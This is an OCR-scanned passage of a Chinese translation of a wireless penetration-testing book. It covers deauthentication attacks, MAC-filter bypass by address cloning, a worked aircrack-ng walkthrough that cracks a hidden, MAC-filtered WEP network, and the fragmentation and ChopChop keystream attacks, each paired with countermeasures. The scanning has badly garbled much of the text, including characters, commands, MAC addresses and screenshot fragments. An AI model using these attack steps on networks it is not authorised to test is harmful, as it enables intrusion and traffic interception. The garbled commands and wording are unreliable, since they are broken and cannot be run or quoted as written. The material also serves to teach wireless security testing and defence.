客 尸 端 ， 以 及 客 己 端的 AP 的 认证 。 最 终 的 结果 是 : 客 尸 端 将 看 到 在 她 的 网 络 连 接 中 有 一 个 中 断 ， 然 后 重新 关联 。 当 她 这 样 做 的 
时 候 ，Kismet 将 在 探测 请 求 数据 包 和 关联 请 求 数据 包 中 看 到 SSID， 同 时 可 以 填写 姓名 。 在 这 种 情况 下 ， 网 络 的 名 称 是 linksys。 
在 此 之 后 ， 如 果 网 络 使 用 WPA， 那 么 该 用 户 将 重新 关联 ， 我 们 将 看 到 客户 端 执行 四 次 握手 的 过 程 。 
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INFU: Got conf igqure event for client 

INFU: Detected new probe network "boondoggle”, BSSI1D O04+1E+64:5 
F159, encryption no, channel 0, od4,00 mbit 

IMFO: letected new probe network “NotHere , BSSIDN OO0+22+oF +d7+d 
F153, encruyption no, channel 0, 5d,00 mbit 


在 OS X 上 加 载 解除 认证 攻击 


目前 ， 在 OS X 上 注入 数据 包 的 唯一 途径 是 使 用 KisMAC。 KisMAC 目 前 支持 注入 功能 的 网 卡 有 prism2、RT73、RT2570 和 和 
RTL8187 心 片 组 。 许 多 Mac 用 户 购 买 使 用 D-link DWL-G122s (该 设备 使 用 RT73 心 片 。 一 一 译 者 注 ) 或 Alfas (该 设备 使 用 
RTL8187 心 片 。 一 一 译 者 注 ) ， 束 是 这 个 原因 。 


假设 你 有 一 个 支持 数据 包 注 入 的 设备 ， 并 在 KisMAC 中 加 载 正确 的 驱动 程序 ， 所 有 你 需要 做 的 歹 是 单 击 Network (网 
络 ) |Deauthenticate (解除 认证 ) 菜单 。KisMAC 将 不 断 地 发 送 广播 数据 包 到 广播 地 址 ， 直 到 你 告诉 它 停 止 这 样 做 。 如 果 你 在 
选择 驱动 程序 的 时 候 遇 到 麻烦 ， 则 仔细 检查 驱动 程序 是 否 支 持 注入 ， 并 确保 设置 了 KisMAC|Driver (驱动 程 
序 ) |Preferences (偏爱 ) |Use As Primary Device (作为 主 设备 使 用 ) 这 一 复 选 框 。 


在 Windows 上 加 载 解除 认证 攻击 


从 Windows 上 友 动 一 个 解除 认证 攻击 的 最 简单 方法 是 利用 WiFi 版 CommView。 如 果 网 卡 支 持 注入 功能 (目前 Atheros) ， 
那么 所 有 你 需要 做 的 是 单 击 Tools (工具 ) |Node Reassociation (证 操 重 新 关联 ) 。 一 旦 成 功 ， 你 会 看 到 一 个 如 下 图 所 示 的 屏 
幕 。 默 认 情 况 下 ，CommView 将 给 所 有 选 定 的 客 尸 端 友 送 一 个 定向 解除 认证 数据 包 ，。 


提示 Cain 和 Abel 也 具有 无 线 的 攻击 能 力 。 然 而 ， 这 些 功 能 只 能 在 AitrPcap 网 卡 上 使 用 。 

提示 当 解 除 那 些 比 KisMAC 更 具 攻 击 性 用 户 认 证 的 时 候 ，Aircrack-ng 相 比 于 CommView 更 具 戌 力 。Aitcrack-ng 发 送 定 向 解除 
认证 数据 包 时 ， 既 给 AP， 也 给 客户 端 。CommView 只 将 解除 认证 数据 包 发 送 给 客户 端 ，KisMAC 发 送 广播 解除 认证 数据 包 。 
人 @ 解除 认证 用 户 的 应 对 措施 


你 不 能 预防 这 种 攻击 ， 仍 然 有 客户 遵循 的 这 一 标准 。 在 未 来 ， 如 果 操 作 系 统 提供 了 一 些 用 户 的 反馈 ， 提 示 他 们 正章 受到 解除 
认证 攻击 ， 这 将 会 变 得 好 很 多 。 无 线 网 络 的 入 侵 检测 (Wireless Intrusion Detection System，WIDS) 在 这 种 情况 下 非常 有 
用 。 虽 然 WIDS 可 能 无 法 让 攻击 者 停止 攻击 ， 但 它 全 人 少 可 以 记录 事件 ， 并 提醒 管理 员 。 


Channel Packets to send: Interval, msec: 
1 1 说 10 已 


send a deauthentcaton redquest from this AP: 


LISCO-LInk:90:5045 (boondogdgle) 


(9) Send to all clients Warning: Use this tool for 
< Intbabng a new WhPA-=PpSK 
key exchange only. Sending 
_ adeauthentcation frame 
| Client Addresses will tem poranly reset 

| IntelCorpo:1ATf9:A0 WLAN connections. 


“) Send broadcast 
(0) Send to the selected clients: 


Send Now 


克 … 击 败 MAC 过 滤 
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大 多 数 AP 人 允许 你 建立 MAC 地 址 信任 列表 ， 然 后 忽略 从 其 他 MAC 发 送 的 任何 数据 包 。MAC 地 址 曾经 是 一 成 不 变 的 东西 ， 所 
以 烧 入 硬件 心 厂 中 ， 永 不 再 变 。 那 些 日 子 已 经 一 去 不 复 返 了 ， 人 在 无 线 网 络 上 这 样 的 策略 富 无 意义 。 


为 了 击败 MAC 过 滤 ， 你 只 需要 窃取 网 络 上 其 他 人 的 MAC 地 址 。 要 做 到 这 一 点 ， 你 需要 运行 一 个 被动 扫 摘 器 ， 让 扫 摘 器 给 出 
这 些 已 经 连接 的 客户 端的 MAC 地 址 。 最 绅士 的 情况 是 ， 你 静 静 地 等 竺 用户 从 网 络 上 上 断 开 。 其 他 选项 包括 关闭 用 户 或 过 试 共享 所 
获得 的 MAC 地 址 。 一 旦 你 选择 了 要 使 用 的 MAC 地 址 ， 克 隆 这 个 地 址 只 需要 几 条 命令 而 已 。 


在 Linux 上 击败 的 MAC 过 滤 


大 多 数 无 线 (和 有 线 的 ) 网 络 接口 允许 动态 改变 MAC 地 址 。MAC 地 址 仅仅 是 ifconfig 命 令 的 一 个 参数 。 例 如 ， 在 Linux 上 设 
置 MAC 地 址 为 00:11:22:33:44:55， 执 行 以 下 操作 : 


[:~]# ifconfig WLanu hw ether O00:11:22:33:44:55 


下 表 总 结 了 在 Linux 2.6.31 下 测试 MAC 地 址 更 改 的 结果 。 正 如 你 所 看 到 的 ， 大 部 分 现代 化 的 驱动 程序 支持 MAC 地 址 更 改 。 


驱动 程序 对 MAC 地 址 更 改 的 文 持 
TthskK 

Tth9kK 

B43 

Rtl8187 

Zd12117w 

Rt2300usb (dwl-g122) 


2 


有 问题 ; EAP 数 据 包 欺骗 的 时 候 有 ， 其 他 时 候 没 有 


在 Windows 上 击败 MAC 过 滤 


要 在 Windows 上 更 改 无 线 网 卡 的 MAC 地 址 ， 你 可 以 手动 使 用 regedit 命 令 进 行 修改 。 运 行 regedit 命 令 ， 然 后 定位 到 
HKLM\SYSTEM\CurrentControlSet\Control\Class(4D36E972-E325-11CE-BFC1-08002bE10318}。 一 旦 找到 这 个 位 置 ， 就 
可 以 找到 所 有 的 无 线 网 卡 。 其 中 的 主键 包括 了 你 的 网 卡 描述 ， 所 以 寻找 应 该 不 会 太 困 难 。 一 旦 你 找到 了 网 卡 ， 就 创建 一 个 新 的 主 
键 ， 并 命名 为 NetworkAddress， 其 类 型 为 REG_SZ (表示 一 种 纯 文本 的 字符 串 格 式 ，SZ 表 示 String Zero， 表 示 该 字符 串 最 终 以 
一 个 \0' 表 示 结 束 。 一 一 译 者 注 ) 。 然 后 输入 你 想 要 的 12 位 MAC 地 址 。 下 面 的 插图 显示 新 的 主键 设置 为 : 00:ca:fe:ba:be:00。 


ECG 


天 Registry Editor 
Fle Edt View Favortes 


Help 
0014 
0015 
J016 
0017 
0018 
0019 
0020 
W021 
022 
0023 


Name Data 
ab InfPath 
ab InfSection 


ns InstallTimeStamp 


Type 

REG SZ 

REG SZ 

REG BINARY 
REG SZ 

REG_ DWORD 
REG DWORD 
REG DWORD 
REG $Y 


oem2,inf 

Install TOSHIBA 
do O07 0a 00 0 0 
poven 30868e 
jx00000001 (1) 
jx00000002 (2) 
jx00000000 (0 
{BEOF T5E 1-3909D 


ab| MatchingDeviceld 
me NixedCellsEnabl... 
me NodulationType 

ne hdisErnvironment 
ab MetCfqgInstanceld 


dl 


1 | 


提示 ”有些 驱 动 程序 通过 Configure (配置 ) |Advanced (高 


0024 
0025 


| 


bb 


Netl uncllrvel ex 
NetTly pe 


新 的 主键 值 二 -0025 | | 晤 [RTITPTR 


中 


地 址 ) 公开 注册 表 主 键 值 。 


值 。 


警告 ” 当 在 Windows 中 变更 MAC 地 址 时 ， 


0027 
,0028 
Propertre 
{4D30E973-E. ~ 
t 


一 定 要 在 cmd 命 令 窗 


pBANumber 
PnpCapabilities 


no hewDe vicelnstal 
ab 


|PortAuthRe 二 [Pv,, 


口中 运行 


J 中 


REG DWORD 


REG 2: 
REG > 


REG DWORD 


REG > 
REG_ DWORD 
REG DWORD 


jx00000003 (3) 
WLAN 
0Ucafebabel0n 
000000111 
C2309011 
0000010 (10 
M00000001 1 

} 


ComputenN\HKEY LOCAL MACHINE\SYSTENN CurrentControlSet\Control\Class {4D36E972-E325-11CE-BFC1-0¢ 


级 ) |Network Address Interface fot the adapter (网 络 适 配器 接口 的 


ipconfig/all 命 令 来 确认 驱动 程序 确实 已 改 成 了 新 的 


不 平 的 是 ， 并 非 所 有 的 驱动 程序 将 按 约 使 用 此 注册 表 键 值 。 在 我 测试 的 所有 Windows 7 驱动 程序 中 ， 只 有 Intel 公 司 的 驱动 
程序 如 约 地 处 理 了 这 种 变化 。 和 希望 随 着 Windows 7 的 成 熟 ， 处 理 的 比例 将 提高 。 为 了 使 这 种 变更 生效 ， 你 需要 依次 禁用 和 重新 
启用 网 卡 。 如 果 重 启 后 的 网 卡 不 工作 ， 就 党 试 重新 启动 网 卡 。 如 果 你 想 恢 复原 来 的 MAC 地 址 ， 只 需要 删除 NetworkAddress 主 
键 即 可 。 


如 果 你 感觉 使 用 regedit 命 令 过 于 烦琐 和 令 人 生 旦 ， 你 可 以 通过 一 些 独立 的 工具 来 协助 你 完成 。 有 两 种 常见 工具 
Tmac (Technitium MAC 地 址 转换 器 ) 和 MacMakeup。 这 些 程序 提供 了 方便 的 图 形 用 户 界 面 ， 但 它们 似乎 除了 更 改 网 络 地 址 
中 NetworkAddress 主 键 值 之 外 ， 也 没 做 更 多 的 事 。 


在 OS X 上 击败 MAC 过 滤 


在 AirPort Extreme 10.5 和 和 10.6 驱 动 程序 中 ， 一 些 鲜 为 人 知 的 功能 允许 你 像 Linux 一 样 在 命令 行 中 更 改 的 MAC 地 址 。 要 这 样 
做 ， 你 的 网 卡 必须 处 于 脱离 关联 状态 。 如 果 在 连接 或 关闭 电源 时 ， 变 更 MAC 地 址 ， 这 些 改变 将 不 会 起 作用 。 


bash-3.2# alias airport="/System/Library/PrivateFrameworks/Apple80211.frame— 
Work/Versions 
/A/Resources/airport' 
bash-3.2# airport -z? iiconftig enl ether O00:01:02:03:04:05; lifconfig enl 
ether O00L: O20304:05 
media: autoselect (<unknown type>} status: inactive 


supported media: autoselect 
上 一 一 户 半 2 、 几 > 小 \、 人 7 /二 ~ 这 人 \、 人 7 4 二 
提示 ”如 果 你 首次 设置 MAC 地 址 没有 成 功 ， 再 试 一 次 。 有 时 需要 多 试 几 次 才 行 。 


请 注意 ， 在 airport 命 令 之 后 紧 跟 一 个 ifconfig 参 数 来 更 改 MAC 地 址 。 这 样 做 使 操作 更 可 靠 ， 同 时 可 以 确定 更 改 命 令 的 确 使 
网 卡 地 址 得 到 了 更 改 。 


@ MAC 过 滤 避 免 的 应 对 措施 


如 果 使 用 MAC 过 滤 ， 那 么 你 无 法 阻止 别人 绕 过 这 种 机 制 。 最 好 的 事情 是 根本 不 使 用 这 种 机 制 ， 或 者 至 少 不 认 为 这 是 一 种 安 
全 控制 。MAC 过 滤 的 边际 效益 是 ， 当 周围 没有 客户 端 时 ， 它 可 以 防止 攻击 者 通过 注入 数据 包 进 行 攻击 ， 但 你 仍然 不 应 该 使 用 
WEP。MAC 过 滤 通 常 是 麻烦 很 多 。 如 果 你 有 一 个 无 线 入 侵 检测 系统 并 且 使 用 了 MAC 过 滤 ， 那 么 入 侵 检测 系统 应 当 能 够 友 现 两 个 
人 在 同一 时 间 共 用 同一 个 MAC 地 址 。 但 是 ， 它 无 法 检测 到 攻击 者 正在 等 竺 用户 断 开 。 


3.3 ”击败 WEP 


WEP 密 铀 有 两 种 长 度 : 40 位 (5 字 节 ) 和 104 位 (13 字 节 ) 。 最 初 ， 供 应 商 只 支持 40 位 密 钥 。 按 照 今天 的 标准 ，40 位 密 钥 短 
得 可 笑 ， 当 第 一 次 部 署 802.11 的 时 候 ， 它 们 粹 用 的 丈 是 这 种 短 得 可 笑 的 40 位 密 钥 。 采 用 这 样 短 的 密 钥 的 一 个 主要 动机 可 能 是 大 
了 算法 出 口 的 限制 。 如 今 ， 很 多 人 都 使 用 104 位 密 铀 。 应 该 指出 ， 一 些 供应 商 指定 使 用 64 位 和 128 位 密 铀 。 少 数 供应 商 甚至 文 持 
256 位 密 钥 。 供 应 商 使 用 64 位 和 128 位 作为 密 钥 是 因为 WEP 使 用 24 位 初始 化 向 量 (Initialization Vector，IV) 。 然 而 ， 由 于 初 
始 化 同 量 是 以 明文 的 万 式 友 送 ， 并 且 该 向 量 包含 在 密 钥 中 ， 所 以 实际 密 钥 位 的 有 效 长 度 是 40 位 或 104 位 。 


3.4 综合 案例 : 


破解 一 个 隐藏 的 MACX 


有 前面 的 例子 同 你 展示 了 如 何 绕 过 特 
网 络 攻 击 事例 。 


自 先 ,我们 把 接口 设置 为 监控 模式 : 


定 的 安全 技术 的 万 法 。 本 市 将 同 你 


过 滤 、WEP 加 密 的 网 络 


示 一 个 针对 隐藏 的 SSID、MAC 过 滤 的 、WEP 加 密 的 


[:~/ch4 ex]# airmon-ng start wlan]7 

Found 1 processes that could cause trouble. 

If airodump-—ng, aireplay-ng or airtun-—ng stops working after 
a Short period of tijme, you may want to kill (scme of) them! 
PLD Name 

S46 avahi—daemon 

Interface Chipset DIijVver 

wlani Athneros ath9k 一 [phy0] 


我 们 应 该 注意 airmon 的 建议 ， 关 掉 可 能 的 麻烦 进程 : 


[root@phoenix:~/ch4 ex|$ stop 


avahi—daemon stop/waiting 
下 一 步 ， 我 们 运行 airodump: 


[2 Ch4 exl# airmon ng ‘start mond 


BSSID #Data, #/s CH 
O00:22:6B:96:50:45 1 UD 1 
OO: TF: 90: FA2:D2:DB 3 UD 6 
BSSID STATION 
00:22:6B:96:50:45 00:11:95:E9:FF 
00: 1F: 90:FA2:D2:DB 00:25:00:40:F9 


从 airodump 输 出 的 信息 中 ， 可 以 看 到 一 个 隐藏 的 网 


(‘monitor mode enabled on mon0) 


avahi—daemon 
MB ENC CIPHER AUTH ESSID 
Dde WEP WEP <length: 11> 
J4de. WPA2 CCMP PSK boondoggle 
PWR Rate Lost Packets Probes 
= U 一 之 4 0 4 
:3 =]1 D4de—04e 0 4 


名 信道 1。 你 可 以 说 因为 它 显示 <length 11> ， 而 不 是 SSID 值 。 你 也 可 


以 说 有 一 个 客户 端 连接 。 首 先 ， 让 我 们 启动 airodump， 将 它 锁 定 到 正确 的 信道 并 开始 收集 其 数据 包 . 
[ :~ ch4 ex]# airodump-—ng 一 -channel 1 --bssliaq 00:22:6B:96:50:45 
-—output-format pcap -WwW HiddenCapture monu 
下 一 步 ， 我 们 需要 解除 那个 客户 端的 认证 ， 这 样 我 们 可 以 看 到 SSID: 
[:~/chd ex|l# :alireplay- ng ~——deauth 1 -=a 00:2236B396:30:45 
= 避 QOLL Qo Ed: EE mODP 
14:06:3 Waiting for beacon frame (BSSID: 0UU0:22:6B: 马 DODU: 二 5) 
14:06:38 Sending 64 directed DeAuth. STMAC 00::11:99:E9: FF: oC| 


是 二 


如 果 我 们 在 这 时 切换 到 airodump， 那 么 我 们 看 到 的 SSID 已 经 暴露 : 


BSss1D #Data, #/s C MB ENG CIPHER AUTH ESSID 
ID:22:6B:96:50:42 1348 U | Jde WEP WEP not for you 
采用 该 万 式 ， 我 们 可 以 从 客 尸 端 使 用 aireplay 生 成 一 些 通 信 流 量 : 
[EL exl#t alireplay- ng -arpreplay =h UO0SLI: BOE9sEE:SG = 二 
OD0:22:0B: 96: 50:432 mon0 
The interface MAC (00:1]5:6D:84:0/:A6) doesn't match the specified MAC {(-h) 
ifconfig mon0 hw ether O00:11:90:E9:FF: JC 
14:14:09 Waiting for beacon frame (BSSID: 00:22:06B:96:50:42) on channel 1] 
read 3852 packets (dot 22865 ARP requests and 14025 ACK3s), 
sent 14451 packets... (499 pps) 
在 aireplay 运 行 时 ， 我 们 切换 到 airodump-ng， 查 看 数据 包 数 量 的 增加 情 ) 
BSSl1D #Data, #/s C MB ENGC CIPHER AUTH ESS1TD 
DU oB:96:20:45 1706 U 1 de WEP WEP not for you 
O022:06B:96:00:45 43581 U 1 de WEP WEP not for you 


看 起 来 我 们 已 经 有 了 足够 多 的 友 动 PTW 攻 击 的 数据 包 了 ，。 


[ :~/ch4 ex]# aircrack-ng . /HiddenCcap 


大 约 1 分 钟 以 后 


KEY FOUND! [ 3C:B4:18:88:8C:82:A4: 
Decrypted correctly: 10Us 


既然 我 们 得 天 了 密 钥 ， 束 到 了 关联 的 时 | 间 了 。 首 先 ， 我 们 通 


Ad: 3E:3 


到 了 停 掉 Aircrack-ng 的 时 间 了 : 


ture-0l1.cap 


‘FC:22:3E ] 


过 使 用 Ctrl+C 键 天 掉 aireplay 和 airodump， 然 后 建立 一 个 管理 


接口 

| = SP alrodump> 

[:~/ch4 ex]# iwconfig wlan’i; essid not for You 

key 3C:B4:18:88:8C:82:A4:A4: 3E:32:FC:22:3E 

[:~/ch4 ex]# iwconfig wlanT 

wlani IEEE 802.1llabgn ESSID: net or you 

Mode:Managed Frequency:2.41]2 GHz Access EDInt: Not-Associated 

Encryption key:3CcB4-1888-8C82-A4A4-3E32-FC22—3E 

咽 .…… 看 来 连接 遇 到 了 麻烦 。 首 先 ， 我 们 可 以 认真 检查 对 airodump 捕 获 的 数据 包 进 行 解 密 所 得 到 的 密 钥 是 否 正 确 
[3 人] 站 :alrdecap ng =Ww 3C:B4:18:8B68:8C 020A4:A4: 
3E:32:FC:22:3E ./HiddenCapture-01.cap 
Total number of packets read 394071 
Total number of WEP data packets 3 
Number of decrvypted WEP packets 151913 

好 了 ， 密 钥 是 绝对 正确 的 ， 因 为 它 正确 地 解密 了 这 么 多 的 数据 包 。 似 乎 AP 可 能 启用 了 MAC 过 滤 功 能 。 


让 我 们 宇 试 捕获 我 们 目 己 的 身份 颈 


念 证 /关联 数 据 包 ， 看 看 会 友 生 什么 : 


[:~/ch4 ex]# tshark -1 mon0 -R "wlan.fc.type subtype == Ox0b™ 一 V 
几 秒 钟 后 ， 驱 动 程序 会 尝试 重新 关联 。 我 们 将 在 对 我 们 的 身份 验证 请 求 的 响应 数据 包 中 看 到 如 下 信息 : 


Fixed parameters (6 bytes) 

Authentication Algorithm: Open System (0) 
Authentication SEQ: OxO0002 
Status code: Unspecified failure (0x000]1) 


告诉 我 们 ， 它 不 会 让 我 们 进入 。 虽 然 这 样 ， 但 我 们 知道 密 钥 是 正确 的 ， 最 大 的 可 能 就 是 AP 实 现 了 MAC 地 址 过 滤 。 让 我 们 
窃取 一 个 当前 正在 连接 的 客户 新 的 MAC : 


ifconfig Wan down 


n 
=ha fconfig wlani hw ether O00:11] :90:E9:FF:JC 
[:~/ch4d exl] ifconfig Wan up 
[roct@phoenix:~/ch4 ex]$ iwconfig wlan’? essid not for you key 3C:B4:18:88:8 


C:B2:A4:BA4d: 3E: 32:EFC:22:3E 
[roct@phoenix:~/ch4 ex]$ iwconfig Wan7 
wlan]i IEEE 802.llabgn ESSID: "not for you" 
Mode:Managed Frequency:2.412 GHz 
Access Point: 00:22:6B:96:50:45 
Encryption key:3CcB4-1888-8C82-AA4A4-3E32-FC22—3E 
Power Management :on 
Link Quality=46/70 Signal level=-64 dBm 


提示 ”执行 无 线 渗透 测试 (pen-tests) 时 ， 一定 要 禁用 Network Manager (网 络 管理 器 ) 或 其 他 的 图 形 用 户 界 面 等 可 能 会 自动 
配置 接口 的 程序 。 像 这 样 它们 将 给 无 线 渗透 测试 带 来 麻烦 。 


狐 似 一 个 驹 术 。 我 们 可 以 告诉 我 们 已 经 成 功 天 联 ， 因 为 Access Point ( 接 入 点 ) 字段 列 出 了 正确 的 BSSID， 并 且 我 们 有 一 个 
Link Quality ( 链 路 质量 ) 的 合理 数值 。 


敬告 ”如 果 我 们 窃取 的 MAC 地 址 的 客户 端 尝试 浏览 茶 个 网 页 ， 它 将 遇 到 麻烦 。 如 果 你 窃取 的 是 一 个 正在 使 用 中 的 MAC 地 
址 ， 那 么 受害 人 会 意识 到 可 能 是 哪里 出 现 了 问题 。 


3.5 ”针对 WEP 的 密 钥 流 恢 复 攻击 


下 面 两 个 针对 WEP 的 攻击 是 用 来 为 给 定 的 初始 化 向 量 恢复 密 钥 流 。 虽 然 恢复 一 个 单独 的 密 钥 流 看 起 来 可 能 不 会 像 恢 复 密 钥 
一 样 有 用 ， 但 是 这 些 攻击 可 在 一 个 平静 的 网 络 上 ， 非 常 有 效 地 产生 数据 通信 流 ， 最 终 导致 恢复 密 钥 。 


WEP 的 工作 原理 是 使 用 RC4 生 成 随机 字 节 流 。 生 成 随机 字 节 ， 然 后 与 明文 数据 包 进行 “ 异 或 ” (XOR) 操作 ,结果 被 称 
为 密 文 。 随 机 字 节 生成 之 前 ，RC4 必 须 与 一 个 私有 密 钥 进行 初始 化 。 如 果 两 个 用 户 都 使 用 相同 的 私有 密 铀 ， 那 么 他 们 会 产生 相同 
的 随机 字 节 。 收 到 消息 的 用 己 可 以 和 随机 字 书 “ 异 或 ”操作 ， 并 生成 加 密 的 消息 和 重新 创建 原始 值 。 图 3-3 的 上 半 部 分 显示 了 如 
何 将 对 包含 “hi bob! ”的 数据 包 使 用 WEP 进 行 加 密 。 


让 我 们 想象 一 下 ， 如 果 攻 击 者 台 道 由 曲 一 的 明文 组 成 的 数据 包 在 加 密 击 的 明文 内 容 ， 将 会 友 生 什么 。 一 旦 她 看 到 传输 中 的 加 


密 数 据 包 ， 她 融 可 能 用 明文 与 观察 到 的 密 文 进行 “ 异 或 ”操作 ， 并 因此 获取 密 钥 沅 。 这 部 分 显示 在 图 3-3 的 下 半 部 分 。 


加 四 本 本 本 国正 
Alice E24 位 ICV 一 一 40 位 的 秘密 密 钥 一 一 J] 


字 币 有 的 密 禄 济 。 一 一 一 一 | 


sai mn [re [oe oe oe Je 
D * [Cll le 


上 一 24 位 ICV 于 一 一 一 。 7 宇 闻 的 窗 文 。 一 一 一 一 


7 字 拉 肘 窄 净 一 村 
我 所 知道 的 好 事 就 是 
Alice 正 要 说 “hi”"， 现 a 
EE EE 
ee Ti CD ener fer le eee er 


密 刍 流 
局 的 明文 | 


牢 节 的 密 祖 诉 


回回 加西 台 本 


图 3-3 WEP 加 客 的 例子 


[ht 


假设 数据 包 为 100 字 节 ， 那 么 攻击 者 最 少 需要 读 取 相同 的 初始 化 向 量 的 加 密 数 据 包 的 前 100 个 字 节 。 假 定 有 2<4 个 初始 化 向 
量 ， 但 这 不 是 一 个 决定 性 的 因素 。 更 麻烦 的 是 ， 攻 击 者 现在 可 以 注入 100 字 节 数 据 包 或 更 少 以 便 使 用 这 个 初始 化 向 量 。 


既然 知道 了 密 钥 流 被 破解 后 的 潜在 用 途 ， 让 我 们 看 看 帮助 攻击 者 检索 密 钥 流 的 两 种 攻击 。 第 一 种 攻击 是 碎片 攻击 ， 它 允许 攻 
击 者 在 几 秒 钟 内 将 已 知 明文 的 几 个 字 证 转换 成 1500 字 节 的 密 钥 流 。 另 一 种 攻击 是 ChopChop 攻 击 ， 它 更 进一步 ， 它 允许 攻击 者 
从 一 个 完全 未 知 的 数据 包 中 同时 恢复 明文 和 密 钥 流 。 虽 然 ChopChop 攻 击 更 强大 (因为 它 不 依赖 于 任何 已 天 明文 ) ， 但 其 速度 
很 慢 ， 平 均 要 运行 时 间 为 数 分 钟 。 


合 " 太 片 攻击 
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了 可 以 在 几 稍 钟 


介绍 


~ 


2005 年 ，Sorbo (Andrea Bittau) 发 表 了 一 篇 论文 讲述 了 他 称 为 碎片 攻击 的 攻击 方式 。 在 论文 中 ， 他 
内 将 一 些 密 钥 流 的 字 节 转换 成 1500 字 节 的 密 钥 流 多 个 优化 算法 (1500 字 节 长 度 是 以 太 网 上 的 最 大 传输 单元 (Maximum 
Transmission Unit，MTU) ， 这 样 做 是 为 了 在 802.11 中 生成 最 大 的 典型 数据 包 ) 。 碎 片 攻 击 最 终 被 并 入 Aircrack-ng 代 码 库 

流 数量 。 并 且 可 以 反复 使 用 。 人 允许 三 个 已 知 的 

字 节 总 是 0xAAL1、 


中 。 
碎片 攻击 可 以 通过 在 每 一 轮 中 使 用 一 个 高 达 16 的 因子 用 来 加 倍 攻击 者 的 密 钥 流 
增加 到 1500 个 ， 并 在 三 次 迭代 以 后 ， 使 其 呈现 指数 级 增长 。 最 常见 的 初始 密 钥 流 的 源 是 SNAP 头 。SNAP 头 是 802.11 
子 呈 心 丰 


7 zc 十 上 
密 钥 沉 字 市 
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数据 包 (加 密 或 以 其 他 方式 ) 中 的 第 一 层 封 委 域 ， 只 有 少数 值 可 以 使 用 。 实 事 求 是 地 进 ，3NAP 头 的 前 3 
0xAA 和 0x03。 这 3 字 节 可 以 用 来 钥 流 的 3 字 书 ， 这 对 于 让 碎片 攻击 开始 工作 已 足够 了 。 

下 面 是 攻击 的 基本 步骤 

1) 首先 ， 等待 要 友 送 的 数据 包 。 即 使 没有 连接 客 尸 端的 AP， 也 会 产生 几 个 数据 包 ，。 

2) 将 一 个 SNAP 头 的 前 3 字 节 (0xAA、0xAA、0x03) 与 捕获 的 数据 包 的 前 3 字 书 进行 “ 异 或 ”操作 。 你 现在 束 有 了 密 钥 流 
36 字 节 的 有 效 载 傈 ) 。 分 成 12 个 3 字 市 一 组 的 雄 片 数据 包 ， 利 用 上 一 步 中 所 观察 到 


的 3 字 节 。 
3) 下 一 步 ， 加 工 三 播 ARP 数 据 包 (总 共 

的 初始 化 同 量 和 密 钥 流 加 密 和 传输 这 些 雄 片 数据 包 。 每 个 碎片 可 以 重复 使 用 密 钥 流 的 相同 3 字 书 

4) 一 旦 完成 传送 碎片 ， 束 查找 一 个 36 字 证 的 数据 包 ， 该 数据 包 由 市 有 设置 FFromDS 位 和 源 地 址 的 AP 数 据 包 传送 。 这 是 从 


AP 转 发 的 ARP 数 据 包 。 因 为 你 加 工 的 数据 包 放 在 首位 ， 所 以 你 知道 整个 36 字 节 的 明文 。 将 加 密 的 数据 包 与 明文 数据 包 进 行 


“已 
FT 


或 ”操作 ， 你 束 可 以 恢复 密 钥 流 的 36 字 忆 


5) 接 下 来 ， 加 工 超 长 的 ARP 数 据 包 ， 长 度 达 384 字 节 (可 以 用 NULL 填 充 ARP 包 ) 。 将 这 个 数据 包 作 为 12 个 32 字 节 的 碎片 发 
送 ， 利 用 在 上 一 步 中 恢复 的 初始 化 向 量 和 密 钥 流 。 等 待 AP 转 友 ; 你 现在 有 了 密 钥 流 的 384 字 书 。 


6) 最 后 ， 加 工 一 个 1500 字 书 的 ARP (再 次 ,用 NULL 填 充 ) 。 作 为 5 个 300 字 书 的 碎片 传送 。 当 数据 包 被 AP 转 友 时 ， 从 数据 
包 中 恢复 密 钥 流 。 现 在 ， 你 已 经 在 数秒 钟 恢复 了 全 部 1500 字 刷 的 密 钥 流 。 


此 时 ， 你 已 经 在 一 个 名 为 fragmentxxxx-yyyy.Xor (XXXxx 和 yyyy 只 是 当前 的 时 间 戳 ) 的 文件 中 保存 了 初始 化 向 量 和 密 钥 流 。 
正如 你 在 前 面 所 看 到 的 ， 你 可 以 利用 这 个 伪造 分 组 的 密 钥 流 和 aireplay 产 生 大 量 的 通信 数据 包 ，。 


流行 
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ChopChop 攻 击 方式 通过 系统 地 一 次 修改 加 密 数据 包 的 一 个 字 节 进行 工作 ， 并 重 放 到 AP， 同 时 监控 AP 是 否 接收 这 些 修改 后 
的 数据 包 ，ChopChop 可 以 在 不 考虑 密 钥 或 密 钥 大 小 的 前 提 下 ， 慢 慢 破 解 WEP 所 保护 的 数据 包 。 它 是 通过 下 列 万 式 实 现 的 : 


J 
1 
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1) 首先 ,等待 要 友 送 的 数据 包 。 即 使 是 没有 连接 客户 端的 AP， 也 将 会 产生 几 个 数据 包 ，。 

2) 从 数据 包 中 删除 最 后 一 个 字 节 ;， 在 假设 删除 字 节 的 值 为 0 的 前 提 下 重新 计算 校 验 和 和 。 将 它 重 新 传送 给 一 个 多 播 地 址 。 看 
看 AP 是 否 会 转 友 这 个 数据 包 。 

3) 如 果 你 看 到 AP 转 友 了 这 个 数据 包 ， 那 么 说 明 校 验 和 是 正确 的 ， 并 因此 可 知 上 一 步 狂 测 的 明文 值 是 正确 的 。 你 只 是 破解 了 
明文 中 的 一 个 字 忆 和 密 钥 流 中 的 一 个 字 市 。 

4) 如 果 AP 没 有 转 友 这 个 数据 包 ， 这 束 说 明 上 一 步 所 猜测 的 明文 值 不 正确 。 将 所 猜测 的 值 加 1， 继 续 上 述 步骤 ， 直 到 猜 的 值 


正确 为 止 (一 个 字 节 最 多 需要 进行 256 次 ) 。 


5) 按 上 述 办 法 重复 对 数据 包 的 每 个 字 书 依次 进行 猜测 ， 直 到 按 你 的 方式 开始 工作 为 止 。 


上 述 步骤 结束 时 ， 你 将 同时 破解 数据 包 中 的 明文 和 密 钥 流 。 数 据 包 中 的 明文 保存 在 一 个 名 为 replay dec-xxxx-yyyyyy.cap 的 
文件 中 ， 密 钥 流 保存 在 一 个 名 为 replay_dec-xxxx-yyyyyy.Xxor 的 文件 中 。 


提示 ”如果 一 个 ChopChop 攻 击 在 执行 中 看 上 去 像 是 被 中 断 了 ， 可 以 试 着 不 断 运 行 aitreplay 中 的 认证 欺骗 。 


F .ex alreplavy-ng --fakeauth 10 


国防 御 密 钥 流 恢 复 攻击 


防御 这 些 攻击 的 最 好 技术 是 使 用 带 CCMP (不 是 TKIP) 的 WPA2 方 法 。 正 如 你 将 在 第 4 章 中 看 到 的 ，TKIP 对 受害 者 进行 基于 
ChopChop 的 高 级 攻击 。 


